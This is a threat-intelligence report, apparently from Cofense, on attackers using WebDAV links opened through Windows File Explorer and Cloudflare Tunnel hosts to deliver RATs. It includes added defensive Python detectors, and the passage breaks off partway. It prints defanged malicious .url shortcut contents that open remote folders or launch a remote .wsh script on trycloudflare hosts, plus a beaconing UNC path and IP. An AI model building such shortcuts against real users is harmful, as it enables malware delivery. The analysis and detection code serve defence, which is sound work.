rss-bridge 2026-02-25T06:00:00+00:00

Abusing Windows File Explorer and WebDAV for Malware Delivery

Cofense Intelligence has identified a growing tactic in which threat actors abuse Windows File Explorer and WebDAV to deliver malware outside of traditional browser-based downloads. By leveraging URL and LNK shortcut files along with Cloudflare Tunnel infrastructure, attackers are disguising remote file servers as seemingly local resources and delivering multi-stage campaigns that frequently end in RAT infections. This report breaks down how the technique works, why it is effective, and what organizations can do to detect and mitigate this evolving threat.


By: Kahng An, Intelligence Team

Cofense Intelligence has been tracking how threat actors abuse Windows File Explorer’s ability to retrieve remote files over Web-based Distributed Authoring and Versioning (WebDAV), an HTTP-based file management protocol, to trick victims into downloading malware. WebDAV is a relatively unpopular method of file transfer and remote file storage nowadays, but it is natively supported within Windows File Explorer (though deprecated as of November 2023) as a way of remotely accessing a file server. Because most people do not know that File Explorer can reach resources on the internet at all, WebDAV is an exploitable way to make people download files without going through a traditional web browser file download. While these TTPs (Tactics, Techniques, and Procedures) have been seen by Cofense as early as February 2024, campaign volume grew in September 2024 and has remained a constant threat since. This report gives an overview of what WebDAV is, how File Explorer can be used to open WebDAV links, and its use in current campaigns.

Key Points

  • WebDAV is a legacy network protocol that is accessible via Windows File Explorer but is rarely used by most users. Threat actors can take advantage of this to trick users into downloading or running malware.
  • Additionally, because WebDAV access through File Explorer never touches the web browser, it bypasses browser security controls entirely, and because the vector is so uncommon it may also bypass some endpoint detection and response (EDR) security controls.
  • Demo instances for Cloudflare Tunnel hosted on trycloudflare[.]com have been abused to host WebDAV servers in multiple, often similar, campaigns seen as early as February 2024.
  • Campaigns seen using this tactic tend to use complex chains of multiple different script payloads and legitimate files to deliver remote access trojans (RATs) that are hosted on different WebDAV servers.
  • 87% of all Active Threat Reports (ATR) seen with this tactic deliver multiple RATs as final malware payloads. Some of the most popular RATs include XWorm RAT, Async RAT, and DcRAT.
  • ATRs capture network and file IOCs of a phishing campaign as well as general behavior and context.
  • URL shortcut files and LNK shortcut files are commonly seen in campaigns with this TTP.

WebDAV Overview

WebDAV is a file management protocol that works over HTTP and was popular as a way of easily handling file transfers before cloud file storage services grew in popularity. In practice, WebDAV is intended to be used as a file server, not unlike how FTP or various cloud file storage solutions are used. Notably, WebDAV has the advantage of working over HTTP, meaning it can be used on anything that supports HTTP. However, because of its unpopularity as a legacy protocol, WebDAV is rarely used by the average user. This also leads to a separate problem with lack of awareness that Windows File Explorer can be natively used to access network resources over the internet, such as WebDAV servers.

Understanding WebDAV Links

Part of this report shows how WebDAV servers can be opened via URL links and Windows UNC paths. URL links usually look like standard web URLs, whereas Windows UNC paths use the Windows-specific path syntax most familiar from file paths such as C:\Program Files\Microsoft. These can also be used to access remote file shares. While the intricacies of how these two link formats differ are out of scope for this report, security analysts should be aware of both formats.

In this example, assume that there is a WebDAV server with a single folder called “My_Files” in the root directory. An example WebDAV URL link may look like the following.

hxxps[://]exampledomain[.]com/My_Files/

Accessing the same WebDAV server via a UNC path may look like the following. Note how the keyword “DavWWWRoot” is added to refer to the root directory on the WebDAV server.

\\exampledomain[.]com\DavWWWRoot\My_Files

By default, a WebDAV server accessed via a UNC path will use HTTP over port 80. A port can be specified after the domain name, and the “@SSL” keyword can be used to select HTTPS. The following examples will both use HTTPS to access the WebDAV server.

\\exampledomain[.]com@443\DavWWWRoot\My_Files
\\exampledomain[.]com@SSL\DavWWWRoot\My_Files

Using WebDAV on File Explorer

When a WebDAV server is accessed via File Explorer, its file contents are presented much like a folder on the local system. This is particularly notable because the only clear indicator that the user is accessing a network resource is the address bar, which shows the server’s IP address or domain name. The following is an image of what File Explorer looks like when connected to a WebDAV server.
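The address forms above (plain http(s) URL, UNC path with the optional @SSL / @port suffix and the DavWWWRoot keyword, and file:// URI) all name the same server, which makes them awkward to compare in logs and blocklists. The helper below is an added example written for this article, not code from the Cofense report; it normalises each form into one canonical http(s) URL using the rules the report states (HTTP on port 80 by default, @SSL or @443 meaning HTTPS). The UNC grammar it accepts, \\host[@SSL][@port]\[DavWWWRoot\]path, is an assumption, and a file:// URI with a non-empty host is treated as that same UNC form.

```python
import re
from urllib.parse import quote, urlsplit

# Added example, not the report's code. Grammar handled (assumed):
#   \\host[@SSL][@port]\[DavWWWRoot\]path      UNC form used by File Explorer
#   file://host[@SSL][@port]/[DavWWWRoot/]path  file:// form, same meaning
#   http(s)://host[:port]/path                  plain WebDAV URL
_UNC_RE = re.compile(
    r"^\\\\(?P<host>[^\\@/]+)"      # host or IP after the leading \\
    r"(?:@(?P<ssl>SSL))?"           # optional @SSL keyword -> HTTPS
    r"(?:@(?P<port>\d{1,5}))?"      # optional @port
    r"(?:\\(?P<path>.*))?$",        # remainder of the path, if any
    re.IGNORECASE,
)


def _netloc(host: str, scheme: str, port: int) -> str:
    """Drop the port when it is the default for the scheme."""
    default = (scheme == "http" and port == 80) or (scheme == "https" and port == 443)
    return host if default else f"{host}:{port}"


def webdav_to_url(address: str) -> str:
    """Return the canonical http(s) URL for a WebDAV address.

    Raises ValueError for local paths (file:///C:/...) and for anything that
    is not a remote address in one of the three forms above.
    """
    addr = address.strip()
    lower = addr.lower()

    if lower.startswith(("http://", "https://")):
        parts = urlsplit(addr)
        if not parts.hostname:
            raise ValueError(f"no host in {address!r}")
        scheme = parts.scheme.lower()
        port = parts.port or (443 if scheme == "https" else 80)
        return f"{scheme}://{_netloc(parts.hostname, scheme, port)}{parts.path or '/'}"

    if lower.startswith("file://"):
        # file://host/dir is the share File Explorer opens as \\host\dir;
        # file:///C:/dir has an empty host and is rejected by the regex below.
        addr = "\\\\" + addr[len("file://"):].replace("/", "\\")

    m = _UNC_RE.match(addr)
    if not m:
        raise ValueError(f"not a remote WebDAV address: {address!r}")

    host = m["host"].lower()
    # Report's rules: @SSL selects HTTPS, @443 also selects HTTPS, otherwise HTTP on port 80.
    port = int(m["port"]) if m["port"] else (443 if m["ssl"] else 80)
    scheme = "https" if (m["ssl"] or port == 443) else "http"

    segments = [s for s in (m["path"] or "").split("\\") if s]
    if segments and segments[0].lower() == "davwwwroot":
        segments = segments[1:]          # DavWWWRoot only names the server root
    path = "/" + "/".join(quote(seg) for seg in segments)
    return f"{scheme}://{_netloc(host, scheme, port)}{path}"


def is_remote_address(address: str) -> bool:
    """True when the address would make File Explorer contact a remote server."""
    try:
        webdav_to_url(address)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # The report's example addresses (exampledomain.com is the report's own placeholder).
    for sample in (r"\\exampledomain.com\DavWWWRoot\My_Files",
                   r"\\exampledomain.com@443\DavWWWRoot\My_Files",
                   r"\\exampledomain.com@SSL\DavWWWRoot\My_Files",
                   "file://exampledomain.com@SSL/DavWWWRoot/po.wsh",
                   "file:///C:/Users/Public/readme.txt"):
        print(f"{sample!r:60} -> {webdav_to_url(sample) if is_remote_address(sample) else 'local'}")
```

Feeding shortcut targets and proxy or DNS telemetry through one normaliser means a single blocklist entry such as a tunnel hostname matches whichever spelling the attacker chose.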


Figure 1: Windows File Explorer connected to a WebDAV server hosted on module-brush-sort-factory[.]trycloudflare[.]com.

WebDAV connections can be invoked in File Explorer in a few different ways. The following is a non-exhaustive list of the most common methods of using WebDAV in File Explorer that are often abused by threat actors.

Direct Linking

When using Windows File Explorer, a user can specify the exact path to a file or folder by using the address bar. This can also be used to connect to network resources by specifying the IP address or domain name of the remote server.

Additionally, the “file[://]” part of a URL specifies that the link is for opening a file or folder via the system’s file browser. This is particularly useful for directly referencing a particular file or folder by its file path. However, it can also be used to create links that open files or folders on remote servers. The following is an example of a URL set to open a folder hosted on a WebDAV server.

file[://]everything-teach-pearl-eat[.]trycloudflare[.]com/DE

URL Shortcut Files

URL shortcut files (.url) are Windows shortcuts to a specified URL. While intended primarily for accessing websites, the URL field can also be set to open local files by using the file:// URI scheme to open the specified file path in File Explorer. Similarly, this can also be used to access a remote file server. The following is an example of a URL shortcut file that connects to a WebDAV server via File Explorer.

[InternetShortcut]
URL=file[://]frontier-shops-timothy-cal[.]trycloudflare[.]com/DE
IDList=
HotKey=0
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9

Additionally, URL shortcut files can be used to open files on the WebDAV server. This is particularly useful for running scripts without the user being aware.

[InternetShortcut]
URL=file[://]module-brush-sort-factory[.]trycloudflare[.]com@SSL/DavWWWRoot/po[.]wsh
IDList=
HotKey=0
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9

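A .url file is a small INI-style text file, so the two samples above can be triaged without opening them in Windows. The script below is an added example written for this article, not code from the Cofense report: it parses the [InternetShortcut] section, decides whether the URL would make File Explorer open a remote share (a file:// URI with a host, or a UNC path) rather than a website, and lists the reasons the shortcut looks suspicious. The sample shortcut contents are constructed with placeholder hostnames, not the report's indicators, and the script-extension watchlist and tunnel-domain suffix list are assumptions.

```python
import os

# Added example, not the report's code. Flags .url shortcuts whose target opens
# a remote file server through File Explorer instead of a web page.
SCRIPT_EXTENSIONS = {".wsh", ".wsf", ".js", ".jse", ".vbs", ".vbe", ".bat", ".cmd",
                     ".ps1", ".hta", ".lnk", ".url", ".exe", ".scr", ".msi"}   # assumed watchlist
TUNNEL_SUFFIXES = ("trycloudflare.com",)   # Cloudflare Tunnel demo domain named in the report

# Constructed sample shortcut contents (placeholder hosts, layout mirrors the samples above).
SAMPLE_WEBSITE = "[InternetShortcut]\nURL=https://www.example.com/\n"
SAMPLE_LOCAL = "[InternetShortcut]\nURL=file:///C:/Users/Public/readme.txt\n"
SAMPLE_TUNNEL_SCRIPT = (
    "[InternetShortcut]\n"
    "URL=file://tunnel-placeholder.trycloudflare.com@SSL/DavWWWRoot/po.wsh\n"
    "IDList=\nHotKey=0\n"
    "[{000214A0-0000-0000-C000-000000000046}]\nProp3=19,9\n"
)
SAMPLE_UNC = "[InternetShortcut]\nURL=\\\\tunnel-placeholder.trycloudflare.com\\new\n"


def parse_url_shortcut(text: str) -> dict:
    """Return the key/value pairs of the [InternetShortcut] section, keys lower-cased."""
    values, in_section = {}, False
    for raw in text.lstrip("\ufeff").splitlines():   # tolerate a UTF-8 BOM
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip().lower()] = value.strip()
    return values


def remote_target(url: str):
    """Return (host, path) when the URL makes File Explorer open a remote share, else None.

    Handles file://host/... (non-empty host) and UNC paths starting with two
    backslashes; an @SSL or @port suffix is stripped from the host.
    file:///C:/... has an empty host and is therefore local.
    """
    if url.lower().startswith("file://"):
        authority, _, path = url[len("file://"):].partition("/")
    elif url.startswith("\\\\"):
        authority, _, path = url[2:].partition("\\")
        path = path.replace("\\", "/")
    else:
        return None
    host = authority.split("@", 1)[0].lower()
    return (host, "/" + path) if host else None


def is_tunnel_host(host: str) -> bool:
    """Exact or subdomain match against the tunnel-domain suffix list."""
    return any(host == s or host.endswith("." + s) for s in TUNNEL_SUFFIXES)


def assess_url_shortcut(text: str) -> dict:
    """Parse one .url file and list the reasons its target looks suspicious."""
    url = parse_url_shortcut(text).get("url", "")
    target = remote_target(url)
    reasons = []
    if target:
        host, path = target
        reasons.append("opens a remote share in File Explorer (file:// host or UNC path)")
        if is_tunnel_host(host):
            reasons.append("host is a Cloudflare Tunnel demo (trycloudflare.com) domain")
        ext = os.path.splitext(path)[1].lower()
        if ext in SCRIPT_EXTENSIONS:
            reasons.append(f"target is an executable or script file ({ext})")
    return {"url": url, "remote_host": target[0] if target else None,
            "reasons": reasons, "suspicious": bool(reasons)}


def scan_directory(root: str) -> list:
    """Assess every .url file under root, e.g. an extracted attachment or a user profile."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".url"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    result = assess_url_shortcut(fh.read())
                if result["suspicious"]:
                    findings.append((full, result))
    return findings


if __name__ == "__main__":
    for sample in (SAMPLE_WEBSITE, SAMPLE_LOCAL, SAMPLE_TUNNEL_SCRIPT, SAMPLE_UNC):
        print(assess_url_shortcut(sample))
```

A mail gateway or sandbox can apply the same check to .url attachments before delivery; a shortcut whose only purpose is to open a remote share from File Explorer has no legitimate place in most inboxes.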
An interesting quirk of URL shortcut files is that, when the URL is written as a Windows UNC path, the file can continuously cause DNS lookups simply by existing in the file system. This behavior appears to be triggered whenever Windows Explorer is browsing the directory that contains the URL shortcut file. Whenever someone browses a directory that happens to contain a URL shortcut file with a UNC path, the file can automatically attempt to reach out to threat actor infrastructure, potentially alerting threat actors that their payload is active on a victim. Figure 2 demonstrates this with a URL shortcut file that has the UNC path \\harbor-microwave-called-teams[.]trycloudflare[.]com\\new. When the directory that contains the file is opened in Windows Explorer, a DNS query is sent out to resolve the domain to 104[.]16[.]231[.]132. Subsequently, a TCP SYN packet is sent to the IP address, incidentally notifying the threat actors that a connection was attempted.

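The repeated lookups described above are visible in host DNS telemetry. The detection below is an added example written for this article, not code from the Cofense report: it reads Sysmon-style DNS query events (Event ID 22, which carries Image and QueryName fields) as JSON lines, alerts when File Explorer resolves a Cloudflare Tunnel demo domain, and marks the alert as beacon-like when the same lookup repeats within a short window. The event records are constructed with placeholder domain, IP and timestamps; that explorer.exe is the process issuing the lookup, the JSON-lines encoding and the QueryResults format are assumptions.

```python
import json
from datetime import datetime

# Added example, not the report's code.
TUNNEL_SUFFIXES = ("trycloudflare.com",)           # demo tunnel domain named in the report
EXPLORER_IMAGES = {"c:\\windows\\explorer.exe"}     # assumed: File Explorer's process image

# Constructed Sysmon Event ID 22 (DNS query) records, serialised as JSON lines.
# Domain, IP and timestamps are placeholders, not indicators from the report.
_RECORDS = [
    {"EventID": 22, "UtcTime": "2024-09-12 10:00:00.101", "Image": "C:\\Windows\\explorer.exe",
     "QueryName": "harbor-placeholder.trycloudflare.com", "QueryResults": "203.0.113.10"},
    {"EventID": 22, "UtcTime": "2024-09-12 10:00:10.500", "Image": "C:\\Program Files\\Browser\\browser.exe",
     "QueryName": "www.example.com", "QueryResults": "203.0.113.20"},
    {"EventID": 22, "UtcTime": "2024-09-12 10:00:31.220", "Image": "C:\\Windows\\explorer.exe",
     "QueryName": "harbor-placeholder.trycloudflare.com", "QueryResults": "203.0.113.10"},
    {"EventID": 3, "UtcTime": "2024-09-12 10:00:31.300", "Image": "C:\\Windows\\explorer.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 80},
    {"EventID": 22, "UtcTime": "2024-09-12 10:01:05.000", "Image": "C:\\Windows\\explorer.exe",
     "QueryName": "harbor-placeholder.trycloudflare.com", "QueryResults": "203.0.113.10"},
    {"EventID": 22, "UtcTime": "2024-09-12 10:03:00.000", "Image": "C:\\Windows\\explorer.exe",
     "QueryName": "fileserver.corp.example", "QueryResults": "10.0.0.5"},
]
SAMPLE_EVENTS = [json.dumps(r) for r in _RECORDS] + ["not json at all"]


def parse_events(lines):
    """Parse JSON-lines Sysmon events, keeping only DNS query events (ID 22)."""
    events = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue                      # skip malformed lines rather than abort the scan
        if ev.get("EventID") != 22:
            continue
        ev["_time"] = datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")
        events.append(ev)
    return events


def is_tunnel_domain(name: str) -> bool:
    """Exact or subdomain match against the tunnel-domain suffix list."""
    n = name.lower().rstrip(".")
    return any(n == s or n.endswith("." + s) for s in TUNNEL_SUFFIXES)


def detect(events, window_seconds=300, min_repeats=2):
    """Alert on File Explorer resolving a tunnel domain; flag repeats inside the window."""
    groups = {}
    for ev in events:
        image = ev.get("Image", "").lower()
        query = ev.get("QueryName", "").lower()
        if image not in EXPLORER_IMAGES or not is_tunnel_domain(query):
            continue
        groups.setdefault((image, query), []).append(ev)

    alerts = []
    for (image, query), evs in groups.items():
        times = sorted(e["_time"] for e in evs)
        span = (times[-1] - times[0]).total_seconds()
        alerts.append({
            "image": image, "query": query, "count": len(evs),
            "first_seen": times[0].isoformat(), "last_seen": times[-1].isoformat(),
            "resolved_to": sorted({e.get("QueryResults", "") for e in evs}),
            "repeated": len(evs) >= min_repeats and span <= window_seconds,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

In production the alert would be enriched with the directory the user was browsing at the time, so the responder can locate and remove the .url file that triggered the lookups.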
[...]

